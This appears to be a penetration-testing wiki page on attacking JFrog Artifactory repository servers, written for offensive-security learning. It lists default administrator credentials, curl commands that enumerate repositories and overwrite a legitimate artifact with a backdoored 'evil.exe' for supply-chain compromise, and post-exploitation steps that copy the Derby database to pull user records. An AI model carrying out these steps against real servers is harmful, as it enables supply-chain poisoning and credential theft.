Artifactory Pentesting
Theory
Artifactory is a widely used binary repository manager that serves as a central hub for managing, storing, and distributing software, binaries, artifacts and dependencies. It supports multiple package types and integrates seamlessly with build tools, CI/CD pipelines, and DevOps workflows.
From an attacker's perspective, this centralization and trust make Artifactory a high-value target. By compromising the server, we can can introduce malicious artifacts that propagate through the development pipeline, enabling supply chain attacks.
Additionally, Artifactory often contains sensitive information, such as API keys, authentication tokens, and embedded secrets within binaries or configuration files, which we may exfiltrate or use to escalate privileges or pivot to other systems.
Practice
Enumeration
Artifactory's web interface run by default on port 8081.
curl http://<TARGET>:8081
Authentication
Artifactory’s default accounts are:
admin
password
common administration account
access-admin
password (<6.8.0) or a random value (>= 6.8.0)
used for local administration operations only
anonymous
’’
anonymous user to retrieve packages remotely, not enabled by default
Modifying Artifacts
If you have administrative/write access to a repository, you can upload a malicious file to replace an original one.
First, enumerate repositories
# Get list of repo
curl -u<USER>:<PASSWORD> "http://<TARGET>:8081/artifactory/api/repositories"|jq
# Replace <KEY> with the target repository found earlier, and query files
curl -u<USER>:<PASSWORD> "http://<TARGET>:8081/artifactory/api/storage/<KEY>"|jq
# We can brows folder and files as follows
curl -u<USER>:<PASSWORD> "http://<TARGET>:8081/artifactory/api/storage/<KEY>/<URI>"|jq
Once we found a interesting file to backdor (e.g http://<TARGET>:8081/artifactory/api/storage/SimpleRepo/app.exe
)
We can replace the file as follows
# Replace using <REPO_URL><TARGET> as url
curl -u<USER>:<PASSWORD> -T evil.exe "http://<TARGET>:8081/artifactory/SimpleRepo/app.exe"
Post-Exploitation
The following are only useful once we have achieved remote code execution or arbitrary file read on the server.
We can copy the database (as artificers usually lock database files) and access the copy to retrieve sensitive information.
# Copy the DB
mkdir /tmp/dbcopy
sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/dbcopy
sudo chmod 755 /tmp/dbcopy/derby
sudo rm /tmp/dbcopy/derby/*.lck
# Access the DB
sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij
ij> connect 'jdbc:derby:/tmp/dbcopy/derby';
ij> select * from access_users;
Resources
Last updated
Was this helpful?